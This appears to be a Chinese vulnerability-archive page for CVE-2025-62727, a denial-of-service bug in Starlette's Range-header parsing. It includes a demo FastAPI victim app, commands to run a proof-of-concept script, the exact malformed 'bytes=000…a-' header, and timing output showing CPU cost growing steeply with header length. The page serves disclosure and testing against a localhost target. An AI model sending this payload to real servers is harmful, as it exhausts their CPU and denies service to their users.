关联漏洞
标题:
Starlette 安全漏洞
(CVE-2025-62727)
描述:Starlette是Encode开源的一个轻量级的 ASGI 框架/工具包。非常适合用 Python 构建异步 web 服务。 Starlette 0.49.1之前版本存在安全漏洞,该漏洞源于FileResponse Range解析合并逻辑存在二次时间处理问题,可能导致CPU耗尽和拒绝服务攻击。
描述
Proof of concept of CVE-2025-62727 that can cause denial-of-service in FastAPI (based Starlette <= 0.48.0)
介绍
# CVE-2025-62727 Demo
## Victim Description
The target victim of CVE-2025-62727 is a simple FastAPI app that:
- Serves `Hello World` at `/`.
- Serves static files under `/static` using Starlette's `StaticFiles`.
- Auto-generates text files containing `A` repeated N times for N in `1024, 2048, 50176` on startup.
## How to run victim
1. (Optional) Create and activate a virtualenv.
2. Install dependencies:
```bash
pip install -r requirements.txt
```
3. Start the server:
```bash
uvicorn main:app --reload
```
4. Open:
- `http://127.0.0.1:8000/` for the index page.
- `http://127.0.0.1:8000/static/1024.txt` etc. for static files.
## Notes
- Static files are generated under the `static/` directory on app startup. Existing files are not overwritten.
- Static serving uses Starlette's `StaticFiles` as requested.
## PoC: CVE-2025-62727 (Range header parsing)
The included `poc.py` triggers CPU-heavy Range parsing in Starlette's `FileResponse` via the `/static` route using a crafted header of the form `bytes=000...000a-`.
Run the server, then in another shell:
```bash
python3 poc.py --sizes 1000,2000,4000,7000
```
Override the target URL (optional):
```bash
python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
```
Notes:
- The PoC targets `http://127.0.0.1:8000/static/50176.txt` by default (a file the app generates). Use `--url` to change it.
- Adjust `--sizes` downward if you see 400/431 (header too large), or upward if headers succeed and you want a stronger effect.
Result Exmaple:
```bash
$ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
[INFO] Target: http://127.0.0.1:8000/static/50176.txt
[MODE] regex (header = 'bytes=' + '0'*N + 'a-')
N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
```
文件快照
[4.0K] /data/pocs/fdc453a0dbc2d3a8be65621421d230cb4ae1fca3
├── [2.1K] main.py
├── [2.3K] poc.py
├── [2.0K] README.md
├── [ 431] requirements.txt
└── [4.0K] static
├── [ 10K] 10240.txt
├── [1.0K] 1024.txt
├── [ 11K] 11264.txt
├── [ 12K] 12288.txt
├── [ 13K] 13312.txt
├── [ 14K] 14336.txt
├── [ 15K] 15360.txt
├── [ 16K] 16384.txt
├── [ 17K] 17408.txt
├── [ 18K] 18432.txt
├── [ 19K] 19456.txt
├── [ 20K] 20480.txt
├── [2.0K] 2048.txt
├── [ 21K] 21504.txt
├── [ 22K] 22528.txt
├── [ 23K] 23552.txt
├── [ 24K] 24576.txt
├── [ 25K] 25600.txt
├── [ 26K] 26624.txt
├── [ 27K] 27648.txt
├── [ 28K] 28672.txt
├── [ 29K] 29696.txt
├── [ 30K] 30720.txt
├── [3.0K] 3072.txt
├── [ 31K] 31744.txt
├── [ 32K] 32768.txt
├── [ 33K] 33792.txt
├── [ 34K] 34816.txt
├── [ 35K] 35840.txt
├── [ 36K] 36864.txt
├── [ 37K] 37888.txt
├── [ 38K] 38912.txt
├── [ 39K] 39936.txt
├── [ 40K] 40960.txt
├── [4.0K] 4096.txt
├── [ 41K] 41984.txt
├── [ 42K] 43008.txt
├── [ 43K] 44032.txt
├── [ 44K] 45056.txt
├── [ 45K] 46080.txt
├── [ 46K] 47104.txt
├── [ 47K] 48128.txt
├── [ 48K] 49152.txt
├── [ 49K] 50176.txt
├── [5.0K] 5120.txt
├── [6.0K] 6144.txt
├── [7.0K] 7168.txt
├── [8.0K] 8192.txt
└── [9.0K] 9216.txt
1 directory, 53 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。